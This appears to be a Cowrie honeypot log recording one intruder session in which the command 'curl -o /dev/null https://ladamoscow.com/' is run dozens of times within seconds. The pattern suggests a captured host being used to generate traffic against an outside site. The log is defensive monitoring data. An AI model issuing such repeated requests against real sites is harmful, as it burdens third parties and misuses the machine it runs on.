{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:45.244370Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:45.281641Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:45.283376Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:45.320639Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:45.321482Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:45.358777Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:45.359733Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:45.401993Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:45.403112Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:45.439700Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:45.440613Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:45.492240Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:45.493157Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:45.532211Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:45.533302Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:45.581587Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:45.582540Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:45.620050Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:45.621001Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:45.661447Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:45.662340Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:45.698915Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:45.699735Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:45.736554Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:45.737444Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:45.774241Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:45.775417Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:45.820256Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:45.821345Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:45.862582Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:45.863550Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:45.912396Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:45.913309Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:45.966524Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:45.967655Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:46.021631Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:46.022912Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:46.075470Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:46.076420Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:46.114037Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:46.115000Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:46.152000Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:46.153115Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:46.189461Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:46.190445Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:46.227423Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:46.228424Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:46.266768Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:46.268020Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:46.305295Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:46.306431Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:46.343559Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:46.344618Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:46.383643Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:46.384546Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:46.431534Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:46.432606Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:46.469160Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:46.470187Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:46.507077Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:46.508040Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:46.544735Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:46.545730Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:46.582531Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:46.583518Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:46.620830Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:46.621879Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:46.663205Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:46.664129Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:46.700637Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:46.702250Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:46.739535Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:46.740578Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:46.778375Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:46.779378Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:46.828531Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:46.829457Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:46.866900Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:46.867806Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:46.905802Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:46.906775Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:46.944160Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:46.945320Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:46.982324Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:46.983383Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:47.020600Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:47.021570Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:47.058840Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:47.060034Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:47.097031Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:47.098281Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:47.135025Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:47.136070Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:47.173045Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:47.174400Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:47.228735Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:47.229429Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:47.266456Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:47.267483Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:47.304056Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:47.305041Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:47.342335Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:47.343335Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:47.379940Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:47.380646Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:47.417501Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:47.418434Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:47.454965Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:47.455955Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:47.492323Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:47.493254Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:47.530186Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:47.530967Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:47.567421Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:47.568380Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:47.620468Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:47.621660Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:47.658451Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:47.659397Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:47.695953Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:47.696867Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:47.733260Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:47.734412Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:47.776126Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:47.777058Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:47.814115Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:47.815124Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:47.854653Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:47.855605Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:47.903494Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
